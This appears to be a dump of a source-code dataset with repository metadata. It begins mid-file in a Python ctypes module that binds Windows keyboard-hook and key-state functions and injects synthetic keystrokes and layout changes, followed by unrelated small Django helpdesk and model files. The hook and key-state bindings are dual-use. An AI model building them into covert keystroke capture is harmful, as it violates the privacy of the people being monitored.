_fields_ = [("dx", ctypes.c_long),
("dy", ctypes.c_long),
("mouseData", ctypes.c_ulong),
("dwFlags", ctypes.c_ulong),
("time", ctypes.c_ulong),
("dwExtraInfo", PUL)]
class InputUnion(ctypes.Union):
_fields_ = [("ki", KeyBdInput),
("mi", MouseInput),
("hi", HardwareInput)]
class Input(ctypes.Structure):
"""
    Top-level structure consumed by the SendInput function
"""
MOUSE = 0
KEYBOARD = 1
HARDWARE = 2
_fields_ = [("type", ctypes.c_ulong),
("ii", InputUnion)]
# Callback function prototype for keyboard hook events
HookProc = ctypes.WINFUNCTYPE(
wintypes.LPARAM,
ctypes.c_int32, wintypes.WPARAM, ctypes.POINTER(KeyBdMsg))
# Sends synthesized input events to the message queue
SendInput = windll.user32.SendInput
SendInput.argtypes = (
wintypes.UINT,
ctypes.POINTER(Input),
ctypes.c_int)
# Retrieves a message from the queue, blocking until one arrives
GetMessage = windll.user32.GetMessageA
GetMessage.argtypes = (
wintypes.MSG,
wintypes.HWND,
wintypes.UINT,
wintypes.UINT)
# Installs the hook callback
SetWindowsHookEx = windll.user32.SetWindowsHookExA
SetWindowsHookEx.argtypes = (
ctypes.c_int,
HookProc,
wintypes.HINSTANCE,
wintypes.DWORD)
# Removes the hook callback
UnhookWindowsHookEx = windll.user32.UnhookWindowsHookEx
UnhookWindowsHookEx.argtypes = (
wintypes.HHOOK,)
# Passes the message to the next function in the hook chain
CallNextHookEx = windll.user32.CallNextHookEx
CallNextHookEx.argtypes = (
wintypes.HHOOK,
ctypes.c_int,
wintypes.WPARAM,
KeyBdMsg)
GetAsyncKeyState = windll.user32.GetAsyncKeyState
GetAsyncKeyState.argtypes = (
ctypes.c_int,
)
GetMessageExtraInfo = windll.user32.GetMessageExtraInfo
SetMessageExtraInfo = windll.user32.SetMessageExtraInfo
SetMessageExtraInfo.argtypes = (
wintypes.LPARAM,
)
def send_kb_event(v_key, is_pressed):
"""
    Send a keyboard input event to the message queue. dwExtraInfo is set to 228
    so that the hook callback can filter out events injected by this module.
    :param v_key: virtual-key code
    :param is_pressed: whether the key is pressed (True) or released (False)
:return:
"""
extra = 228
li = InputUnion()
flag = KeyBdInput.KEYUP if not is_pressed else 0
li.ki = KeyBdInput(v_key, 0x48, flag, 0, extra)
input = Input(Input.KEYBOARD, li)
return SendInput(1, ctypes.pointer(input), ctypes.sizeof(input))
def send_unicode(unicode):
extra = 228
li = InputUnion()
flag = KeyBdInput.UNICODE
li.ki = KeyBdInput(0, ord(unicode), flag, 0, extra)
input = Input(Input.KEYBOARD, li)
return SendInput(1, ctypes.pointer(input), ctypes.sizeof(input))
def change_language_layout(language):
hwnd = win32gui.GetForegroundWindow()
im_list = win32api.GetKeyboardLayoutList()
im_list = list(map(hex, im_list))
# print(im_list)
if hex(language) not in im_list:
win32api.LoadKeyboardLayout('0000' + hex(language)[-4:], 1)
im_list = win32api.GetKeyboardLayoutList()
im_list = list(map(hex, im_list))
if hex(language) not in im_list:
return False
result = win32api.SendMessage(
hwnd,
win32con.WM_INPUTLANGCHANGEREQUEST,
0,
language)
return result == 0
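if __name__ == '__main__':
    # Minimal sketch: tap the "A" key, type one character and switch layouts.
    # 0x41 is the standard Windows virtual-key code for "A"; the sample
    # character and the en-US layout id (0x0409) are illustrative values.
    send_kb_event(0x41, True)
    send_kb_event(0x41, False)
    send_unicode('x')
    change_language_layout(0x0409)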
| 21.82 | 68 | 0.632676 | 1,845 | 0.39866 | 0 | 0 | 0 | 0 | 0 | 0 | 820 | 0.177182 |
397163cbc30071660c1df03a91c22f9cdffa46d3 | 496 | py | Python | helpdesk/simple/views.py | fratoj/helpdesk | 302c41491f26432bd65e468f015cdb123a47bcad | ["MIT"] | null | null | null | helpdesk/simple/views.py | fratoj/helpdesk | 302c41491f26432bd65e468f015cdb123a47bcad | ["MIT"] | 4 | 2021-04-08T21:51:21.000Z | 2021-06-10T20:21:24.000Z | helpdesk/simple/views.py | fratoj/helpdesk | 302c41491f26432bd65e468f015cdb123a47bcad | ["MIT"] | null | null | null
from django.shortcuts import render
import numpy as np
def index(request):
return render(request, 'simple/index.html')
def room(request, room_name):
safe = np.random.normal(size=20, loc=0, scale=1)
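    # 20 standard-normal samples; .tolist() below turns the numpy array into a
    # plain list so the template context stays JSON-serialisable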
return render(request, 'simple/room.html', {
'room_name': room_name,
'some_thing': {
'yolo': 'fish',
'test': [1,2,3],
},
'stay': safe.tolist()
})
def question(request):
return render(request, 'simple/question.html')
| 21.565217 | 52 | 0.59879 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 106 | 0.21371 |
397474e797b04315ff3ee3188dba1be27f9df132 | 752 | py | Python | fullthrottleapp/models.py | Pranjali16/FullThrottle-Project | bb6fbd3783d22c2e47ad85687e18f02a30c69799 | ["Apache-2.0"] | null | null | null | fullthrottleapp/models.py | Pranjali16/FullThrottle-Project | bb6fbd3783d22c2e47ad85687e18f02a30c69799 | ["Apache-2.0"] | null | null | null | fullthrottleapp/models.py | Pranjali16/FullThrottle-Project | bb6fbd3783d22c2e47ad85687e18f02a30c69799 | ["Apache-2.0"] | null | null | null
from django.db import models
from django.contrib.auth.models import AbstractBaseUser
class User(AbstractBaseUser, models.Model):
"""User Model"""
name = models.CharField(max_length=500, blank=True, null=True)
tz = models.CharField(max_length=500, blank=True, null=True)
USERNAME_FIELD = 'name'
def __str__(self):
return str(self.name)
class ActivityPeriod(models.Model):
""" Activity Period Model"""
user_id = models.ForeignKey(User, related_name='user_activity', null=True, blank=True,
on_delete=models.CASCADE)
start_time = models.CharField(max_length=500, blank=True, null=True)
end_time = models.CharField(max_length=500, blank=True, null=True)
| 34.181818 | 91 | 0.679521 | 653 | 0.868351 | 0 | 0 | 0 | 0 | 0 | 0 | 65 | 0.086436 |
3974ecf545e9249007cc970e291df529ea220e8f | 83 | py | Python | devind_helpers/validator/__init__.py | devind-team/devind-django-helpers | 5c64d46a12802bbe0b70e44aa9d19bf975511b6e | ["MIT"] | null | null | null | devind_helpers/validator/__init__.py | devind-team/devind-django-helpers | 5c64d46a12802bbe0b70e44aa9d19bf975511b6e | ["MIT"] | 4 | 2022-02-18T09:24:05.000Z | 2022-03-31T16:46:29.000Z | devind_helpers/validator/__init__.py | devind-team/devind-django-helpers | 5c64d46a12802bbe0b70e44aa9d19bf975511b6e | ["MIT"] | null | null | null
from .validators import Validator, BaseRule
__all__ = ('Validator', 'BaseRule',)
| 16.6 | 43 | 0.73494 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 21 | 0.253012 |